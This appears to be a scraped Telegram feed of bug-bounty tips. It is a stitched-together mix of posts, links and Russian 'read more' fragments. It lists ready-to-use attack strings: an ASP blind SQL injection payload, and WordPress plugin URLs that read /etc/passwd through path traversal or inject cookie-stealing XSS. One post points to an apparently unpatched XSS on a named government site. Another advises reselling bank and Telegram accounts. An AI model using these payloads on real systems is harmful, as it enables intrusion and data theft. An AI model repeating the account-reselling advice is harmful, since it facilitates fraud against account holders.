2246
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Xss lab: https://brutelogic.com.br/gym.php
https://brutelogic.com.br/gym.php?p=gitbook
30 level
NUCLEI101 FOR BUG BOUNTY CHEATSHEET
Sun, 18 Jun 2023 17:07:46 GMT
https://medium.com/p/3eaf3c35b39
Read this book after owasp top 10
You will learn more vulnerabilities
1 page in 1 day
🔥Quick NextJS Website Recon Tip by renniepak
A quick way to find "all" paths for Next.js websites:
👇DevTools->Console
console.log(__BUILD_MANIFEST.sortedPages)Читать полностью…
javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));
🚨 Ever wonder why your API calls are getting blocked?
Cross-Origin Resource Sharing (CORS) can be the culprit! When your JavaScript tries to communicate with an API on a different domain, the browser steps in to protect you. CORS ensures that only approved domains can make those requests. Learn how to manage these "preflight" checks and configure your server correctly to allow legitimate cross-origin requests.
Hit save to stay in the know and never let CORS block your code! 🔒
👉 Follow us for more cybersecurity tips and tricks!
🌐 Visit us at www.cipherops.xyz
📲 @cipherops.tech
https://www.instagram.com/p/C_fObBqShyT/?igsh=dWloN2lpeGx0ZHU0
Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
⚡️Wordpress Endpoints to look -
check this if you have these plugin. ⚡️
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Deobfuscation and analysis
of client-side JavaScript code
to detect DOM-based XSS.
Join the discussion group guys
/channel/bug_hunting_talks
today i got an intresting reflected xss, in karnataka gov website
/kn where the lang_name param is vulnerable
Thanks, guys for this suggestion I was stuck but seeing the money and the content provided by hackthebox academy, i am planning to first take the CPT as it covers almost all the topics and also so many people says that the exam. Is more tougher than oscp, so after reading all those articles and redit suggestion and youtube review, I am planning to first complete the CPT, once done later I will take the OSCP. And I also suggest you guys this only if you are a beginner or a intermediate, first take the alternative courses to oscp, and once you get things done, you will get confident and later you can pass the oscp in one time. Bec it cost a lot........ 🤑💰
Читать полностью…
Guide to Using Nuclei: learntheshell/guide-to-using-nuclei-9c37869be30e?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@learntheshell/guide-to-using-nuclei-9c37869be30e?source=rss------bug_bounty-5
Читать полностью…
7 free online #OSINT Tools
GHUNT - Google account info
Sherlock - nickname enumeration
Holehe - search accounts by email
Ignorant - search accounts by phone
Whois domain lookup
WhatsApp profile info
HudsonRock - email leaks lookup
osint.rocks
Tip by twitter.com/0xtechrock
@OsintGit
What a morning🫡
I started this channel last year in the name of "BugBounty tips by cipherops.xyz"
It took me total of 10months to reach 1k subscribers, but I was happy when I saw that and it took me just 1 month to get 500 subscribers.
All you need to do is just start😄
The best thing of this year..... 💓💓
🔵 How to make money on Telegram {Full Guide} 🔤
1. Start doing Airdrops today ! When new crypto currency launches and pay people for small tasks like channel join and refers, it is called Airdrop.
There are many telegram bots for Airdrops which are legit like KuCoin , Tomarket etc
2. Make a channel and start collecting audience. If you have audience, then you can sell courses and things, you can earn by Ad revenue, you can earn by doing Promotions.
There are always a easy way and a hard way for everything. If you want hard way, then you can make content and share it in channel with your channel link in the post so that organic members come when audience share your post. OR by the easy way you can invest some money to buy paid promotions and easily scale up your earnings abd reach. (Easy way is better in my view)
3. Now on your channel, you can refer, you can sell, you can promote. Earnings will increase in proportion to activeness in your channel. So NEVER force anyone to join your channel. [It's so cheap]
4. Join public groups and star reselling stuff like Bank accounts, ott accounts, subscriptions, tg accounts or any stuff. Market on Telegram Groups is so big. You haven't seen it yet.
5. It's important to keep your mind calm and bring consistency in your work to make it work. So eat healthy, meditate 10 mins daily and live with good mindset people. Your company decides your future.
🙂 Must join our Channel @bugbounty_tech
Give Reactions fast and share post else no more methods 💧
https://cyfare.net/
- ExploitDB - Exploits, Shellcodes, Dorks
- Malware Query Engine - Download, Search, Hunt & Intel
- Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox
Blackbox-Fuzzing of IoT Devices Using the Router TL-WR902AC as Example - https://tsmr.eu/blackbox-fuzzing.html
Читать полностью…
Analysis of CVE-2024-43044 — From file read to RCE in Jenkins through agents
https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
☄️AutoRecon- It is a multi-threaded network reconnaissance tool which performs automated enumeration of services.
🔗https://github.com/Tib3rius/AutoRecon
Actually I am using foreign number soo not to worry if It's ban in India.
Читать полностью…